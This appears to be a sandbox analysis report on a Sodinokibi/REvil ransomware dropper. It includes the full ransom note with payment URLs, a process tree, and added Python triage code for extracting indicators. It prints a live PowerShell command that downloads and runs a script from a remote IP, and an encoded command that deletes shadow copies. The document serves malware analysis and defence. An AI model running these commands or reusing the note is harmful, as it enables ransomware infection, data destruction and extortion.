Analysis

  • max time kernel
    143s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7v200217
  • submitted
    20-03-2020 04:10

General

  • Target

    fdjnedGV.bat

  • Size

    192B

  • MD5

    8f7dffa5522df79e5b33140373b3d1af

  • SHA1

    ce53fe47f145c69821fb62aded58cc7111b30354

  • SHA256

    cb8dd0fea847727d0f111df73187d8f78b67479c9225cfc7c32860a915dd5832

  • SHA512

    699adbc5eed8f93f1e6c324c96379b5ed4da00a5c72df782854f5f0281d6d7c0c2350899b93570a4316b457a96d169aa8226c5199b5adf2c101fb8c0b4321c8c

Malware Config

Extracted

  • Language
    ps1
  • Source
    ps1.dropper
  • URLs
    http://185.103.242.78/pastes/fdjnedGV

Extracted

  • Path
    C:\5g997z561s-readme.txt
  • Family
    sodinokibi
  • Ransom Note
    ---=== Welcome. Again. ===---

    [+] Whats Happen? [+]

    Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 5g997z561s.
    By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

    [+] What guarantees? [+]

    Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
    To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
    If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.

    [+] How to get access on website? [+]

    You have two ways:

    1) [Recommended] Using a TOR browser!
      a) Download and install TOR browser from this site: https://torproject.org/
      b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2DBFECC82F6AF3F5

    2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
      a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
      b) Open our secondary website: http://decryptor.cc/2DBFECC82F6AF3F5

    Warning: secondary website can be blocked, thats why first variant much better and more available.

    When you open our website, put the following data in the input form:
    Key:

    bVQLaXSXcWa8RxXMIA0aIl3gSkyCijvsBK/SzoK+YaVJFVTUSR4xW0YAxcoGXbNo
    wujfDbAs5VBc/hX0odmfe98+3gM3QZNvND8BWF8LClb6keOVhpqdkkCB1LInIXvq
    pQCS25bVmRdom79LllyTgY1w3kGiiH7W6E8A2PWG+jhh6CqAQvjle1LeyUXA6Xbu
    sKYJZVRGe2TsVD1RiXNva2gdI2xjshqyi3jc5UnGilIk8Sm9VIT8eU5fLejGFA/S
    ody7mDrrIR+v+GJszxWSThccf5Ydpq9aZEvyfKY71rC+H/0/xYC9TqZTtSb1vbhX
    zY3nMfkJR5Y2BRJjk/d0aa882ZBzR5vuDK9Lt85rR25GLDwYwr/9F7GyqqdChdDN
    f1aLs1KgpEnHw/8KF1dBKvH5QmeSje3yvmpt5oXUf6nbvxkGiosHzOemvkA5Zx0s
    llnXPxQ/tXZ0StgmWBExcMKvovDyxP4k1Q8GLRgIeq6nSBKBOC0xBU0TiodKntRG
    3iVnnIew7415sCeIek7UBdg5pdNNvVwIVuOT9nhj0Jqi7Fje/6ffhu8nS0nzspiI
    raGKfMELwfEBDoUAtqM5BwsrXx/VGx99BZcK6UUHicfGAKNOfzSGQTDS0yq7ue7g
    STi9tmn658toHwDmgxsRSkXKxN5hEr1wNlk/y6GLN9zn+3iTEnPPT2JREFaAKRh3
    Kv0ZXqYwATBEWjwPPCiEGmnaSv54qpoZhIf5O8XcqjPHxg7ec25LqBGmj5ej4Tvw
    Fau1LR7mcsfDB4Eb2C/D85pddDGS3oJtTkgfezxQ2LNxmtIQXgD45RNwFDEBDEA3
    p6r5v8Yz6KKBesit8zFz5iVwTqKj/KyP5yg6pCD0z4xSWtSxA9We/sd1aLWoRlbm
    E3q3BHAxKlXaLcUxi6zLuR8RHv37kmfFnMHU5ohM6fWfTfS0fKhcVk4cb4HQdwUI
    Ykx65E9wcpkCrUKfHie7uIHAdL3OolUP+N03Jhn1oSn6j2ZqE4vT8WbNlrRPQ8Wl
    mB7QwdFS9DR8+qv2UEkNzZZYBWaLx9/5aOSGXvItH19XlU86Nyc03KQzKlRN/rx5
    bR/DPUhL3hu+Ks3VD446Z5N0779NxZ32eTxN2gEohJ2OYUTKFL8AaQbCUmfxo8GI
    9DFIzT7ZwvF8uA6FvMnm/T3QmzJHYZYlEaGgwVV0eQJz7uwqVPdewjb/rY1waoOA
    lRzZ9VWINifxgVhbi3/49tLNjbQmK3mdUZj56bmv7+7Ap3F75iJUNaFHNdyn8PUT
    CMbcx3UXQOboFm7B2BjAzc5rAhVKPFLS33rCDEw+pFLkVcDXAkBL2g==

    Extension name:

    5g997z561s

    -----------------------------------------------------------------------------------------

    !!! DANGER !!!
    DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data.
    !!! !!! !!!
    ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
    !!! !!! !!!
  • URLs
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2DBFECC82F6AF3F5
    http://decryptor.cc/2DBFECC82F6AF3F5
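The Malware Config block above is the sandbox's automatic extraction from the dropped note. The following Python is an added example of the same extraction, not the sandbox's own extractor: it pulls the extension, the victim key block, the .onion and clearnet payment URLs and the per-victim path ID from a Sodinokibi/REvil note, and checks that the extension claimed in the body matches the one in the form block and that both sites carry the same ID. The sample note is a constructed, abbreviated copy of the note above (the extension, both URLs and the first and last key lines are the page's; elided parts are marked `...`); the regexes, field names and function name are my own.

```python
import re

# Constructed, abbreviated copy of the note extracted above. The extension, both
# URLs and the first and last key lines are the page's own; the remaining key
# lines and the boilerplate paragraphs are elided with "..." to keep it short.
SAMPLE_NOTE = """---=== Welcome. Again. ===---
[+] Whats Happen? [+]
Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 5g997z561s.
...
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2DBFECC82F6AF3F5
...
b) Open our secondary website: http://decryptor.cc/2DBFECC82F6AF3F5
...
When you open our website, put the following data in the input form:
Key:
bVQLaXSXcWa8RxXMIA0aIl3gSkyCijvsBK/SzoK+YaVJFVTUSR4xW0YAxcoGXbNo
...
CMbcx3UXQOboFm7B2BjAzc5rAhVKPFLS33rCDEw+pFLkVcDXAkBL2g==
Extension name: 5g997z561s
-----------------------------------------------------------------------------------------
!!! DANGER !!!
"""

URL_RE = re.compile(r"https?://[^\s'\"<>]+")
# v3 onion service: 56 base32 characters, then the per-victim hex path.
ONION_RE = re.compile(r"^https?://[a-z2-7]{56}\.onion/[0-9A-Fa-f]{8,}$")
VICTIM_ID_RE = re.compile(r"/([0-9A-Fa-f]{8,})/?$")
B64_LINE_RE = re.compile(r"^[A-Za-z0-9+/=]+$", re.M)


def parse_revil_note(text: str) -> dict:
    """Pull the IOC fields a config extractor wants from a Sodinokibi/REvil note."""
    claimed = re.search(r"has expansion\s+(\S+?)\.", text)       # extension in the body text
    field = re.search(r"Extension name:\s*(\S+)", text)           # extension in the form block
    key_block = re.search(r"Key:\s*(.*?)\s*Extension name:", text, re.S)
    # Keep only lines in the base64 alphabet so line wrapping and stray text drop out.
    key = "".join(B64_LINE_RE.findall(key_block.group(1))) if key_block else ""
    urls = URL_RE.findall(text)
    onion = [u for u in urls if ONION_RE.match(u)]
    clearnet = [u for u in urls if ".onion/" not in u and VICTIM_ID_RE.search(u)]
    ids = sorted({VICTIM_ID_RE.search(u).group(1) for u in onion + clearnet})
    return {
        "extension": field.group(1) if field else None,
        "extension_consistent": bool(claimed and field and claimed.group(1) == field.group(1)),
        "key": key,
        "onion_urls": onion,
        "clearnet_urls": clearnet,
        "victim_ids": ids,   # one ID shared by both sites means one campaign record
    }


if __name__ == "__main__":
    for name, value in parse_revil_note(SAMPLE_NOTE).items():
        print(f"{name}: {value}")
```

The victim ID is the pivot worth keeping: it is what the operator's site keys on, so the same ID on the .onion and decryptor.cc URLs ties both to one infection record.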

Signatures

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Sodin, Sodinokibi, REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Drops file in Program Files directory 19 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Blacklisted process makes network request 134 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\fdjnedGV.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:1852
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/fdjnedGV');Invoke-NBPNZEPPV;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Blacklisted process makes network request
      • Modifies system certificate store
      • Drops file in System32 directory
      • Discovering connected drives
      PID:1876
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Discovering connected drives
        PID:1988
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1484
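The process tree above is the whole infection chain: cmd.exe runs the .bat, which starts a PowerShell download cradle (IEX over WebClient.DownloadString from 185.103.242.78) and calls a function from the fetched script; that script then spawns a second PowerShell with -e. The -e argument is base64 over UTF-16LE and decodes to `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}`, the Volume Shadow Copy wipe that Sodinokibi runs before encrypting, which is why vssvc.exe appears in the tree and the "Modifies service" signature fires. The following Python is an added triage helper, not part of the sandbox report: it decodes -EncodedCommand arguments, pulls URLs and tags the download-cradle and shadow-copy-deletion patterns over a list of command lines. The two command lines are taken from the tree above; the regexes, tag names and function names are my own.

```python
import base64
import re

# The two PowerShell command lines from the process tree above (taken from the
# report, not constructed).
CRADLE_CMDLINE = (
    r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "
    '"IEX (New-Object System.Net.WebClient).DownloadString('
    "'http://185.103.242.78/pastes/fdjnedGV');Invoke-NBPNZEPPV;Start-Sleep -s 10000\""
)
ENCODED_CMDLINE = (
    "powershell -e "
    "RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQA"
    "bwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAA"
    "ewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENCODED_ARG_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
URL_RE = re.compile(r"https?://[^\s'\"()]+")
# Invoke-Expression fed by a WebClient/Invoke-WebRequest download, in either order.
CRADLE_RE = re.compile(
    r"(?i)\b(?:iex|invoke-expression)\b.*\b(?:downloadstring|downloadfile|invoke-webrequest|iwr)\b"
    r"|\b(?:downloadstring|downloadfile|invoke-webrequest|iwr)\b.*\b(?:iex|invoke-expression)\b"
)
# Three common ways ransomware wipes Volume Shadow Copies before encrypting.
SHADOW_RE = re.compile(
    r"(?i)win32_shadowcopy|vssadmin(?:\.exe)?\s+delete\s+shadows|shadowcopy\s+delete"
)


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE text; drop a BOM if one is present."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le").lstrip("\ufeff")


def triage(cmdline: str) -> dict:
    """Decode, extract and tag a single command line."""
    result = {"cmdline": cmdline, "decoded": None, "urls": [],
              "download_cradle": False, "shadow_copy_deletion": False}
    text = cmdline
    m = ENCODED_ARG_RE.search(cmdline)
    if m:
        try:
            result["decoded"] = decode_encoded_command(m.group(1))
            text = f"{cmdline} {result['decoded']}"   # match on the raw and decoded forms
        except (ValueError, UnicodeDecodeError):
            pass   # not valid base64/UTF-16: keep decoded=None and match the raw line only
    result["urls"] = URL_RE.findall(text)
    result["download_cradle"] = bool(CRADLE_RE.search(text))
    result["shadow_copy_deletion"] = bool(SHADOW_RE.search(text))
    return result


def triage_tree(cmdlines):
    """Tag every command line in a process tree and summarise the chain."""
    results = [triage(c) for c in cmdlines]
    tags = set()
    for r in results:
        if r["decoded"] is not None:
            tags.add("encoded_command")
        if r["download_cradle"]:
            tags.add("download_cradle")
        if r["shadow_copy_deletion"]:
            tags.add("shadow_copy_deletion")
    return results, sorted(tags)


if __name__ == "__main__":
    results, tags = triage_tree([CRADLE_CMDLINE, ENCODED_CMDLINE])
    for r in results:
        print(r["decoded"] or r["cmdline"], r["urls"],
              "cradle" if r["download_cradle"] else "",
              "shadow-wipe" if r["shadow_copy_deletion"] else "")
    print("chain tags:", tags)
```

Matching on both the raw line and the decoded text matters: the shadow-copy wipe is invisible in the raw command line and only appears after decoding, while the cradle's URL is only in the raw line. Invalid base64 after -e is left undecoded rather than raising, since script-block logging and EDR telemetry regularly hand you truncated arguments.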

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_266260b1-506b-46ee-8ffd-f74ade426d58

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_47931ed0-1f3a-4727-b467-1abba254408f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_787e939b-6ce7-4022-b0df-f2cadaf1211f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7b368953-2fc5-4e6c-ac0c-4e9ca5ec1dea

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9adcef47-d90e-41e7-bb27-93604e256a20

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f66dfe3c-3c50-4c57-9265-ac0c7644a88d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms